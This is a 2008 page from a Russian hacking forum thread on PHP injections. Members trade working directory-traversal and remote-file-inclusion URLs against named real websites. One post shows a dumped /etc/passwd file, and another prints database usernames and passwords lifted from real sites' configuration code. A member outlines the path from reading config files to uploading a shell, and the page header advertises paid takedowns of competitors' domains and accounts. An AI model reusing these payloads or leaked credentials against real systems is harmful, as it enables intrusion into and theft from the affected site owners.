PHP Иньекции — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 72 из 143

« Первая

122

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

18.06.2008, 01:26

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f =../

25.06.2008, 15:01

DJ ][akep

Познающий

Регистрация: 27.01.2008

Сообщений: 57

Провел на форуме:
355954

Репутация: 32

Цитата:

Сообщение от Ch3ck

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f =../

А лучше сюда и шела ненадо полный рут

http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../

27.06.2008, 15:48

Fluxoid

Новичок

Регистрация: 12.06.2008

Сообщений: 8

Провел на форуме:
119585

Репутация: 12

Код:

http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE]
http://iron-brigade.org/btech/html/page.php?fichier=[INCLUDE]
http://bagowei.free.fr/_php/contener.php?path=..%2F..%2F&file=[INCLUDE]&title=Bagowei

remote including

18.06.2008, 08:34

#urbaner

Новичок

Регистрация: 30.03.2008

Сообщений: 19

Провел на форуме:
95226

Репутация: 10

Цитата:

http://www.indianstudios.net/rotterdamfilmfestival.php?id=[INCLUDE]

Вот вроде иньекция.

19.06.2008, 16:49

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Цитата:

Сообщение от #urbaner

Вот вроде иньекция.

нету иньекции тут мистер

24.06.2008, 17:23

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

Провел на форуме:
2808062

Репутация: 155

www.iauneka.ac.ir

Код:

http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/passwd
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/hosts
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/services
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/group
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/profile
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/inputrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/bashrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/skel/.bashrc

27.06.2008, 09:10

FraiDex

Участник форума

Регистрация: 16.06.2006

Сообщений: 179

Провел на форуме:
515368

Репутация: 135

http://www.kasseler-cms.net/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

27.06.2008, 12:44

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

Провел на форуме:
2808062

Репутация: 155

PR 5

Код:

http://www.socialweb.be/nl/archieven/index.php?File=../../../../../../../../../../../etc/passwd%00

28.06.2008, 00:58

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от Naydav

под сотню юзеров , а каждый юзер, возможно - "сайт"
только толку...

а толк от инклуда есть... можно читать файлы.. следовательно можно читать конфиги.. отсюда моожно получить путь до домашних каталогов этих сайтов, потом поискать дыры и в конце концов залить на это чертов сервер шел... а там уже твори что твой душе угодно=)

#10

28.06.2008, 02:08

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

1) http://www.ejls.eu/download.php?file=../etc/passwd

Цитата:

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0

perator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:

Сколько не мучался пути к конфигам ненашел, пути брал отсюда:
https://forum.antichat.ru/thread49775.html

2) http://www.jff.org/download.php?file=../index.php

Цитата:

$hostname_JFF = "localhost";
$database_JFF = "jff_content";
$username_JFF = "jff_contentReade";
$password_JFF = "^&%623kjlfsdf_$43";

Цитата:

<?php
function connectToDatabase() {
$dbh=mysql_connect ("localhost", "helpuc_helpuc2hu", "xd1iqXSO9m")
or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("helpuc_helpuc2helpuconnect");
}
function query ($sql)
{
$query_result=mysql_query($sql) or die("Couldn't execute following query:<b>".$sql."</b> because of".mysql_error());
if (!$query_result) return (0);
$out=array();
// if (mysql_num_rows($query_result)>1) {
while ($value=@mysql_fetch_array($query_result,MYSQL_ASS OC)) $out[]=$value;
//} else $out=@mysql_fetch_array($query_result,MYSQL_ASSOC) ;
if (count ($out)>=1) return ($out);else return $query_result;

}
?>

Страница 72 из 143

« Первая

122

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules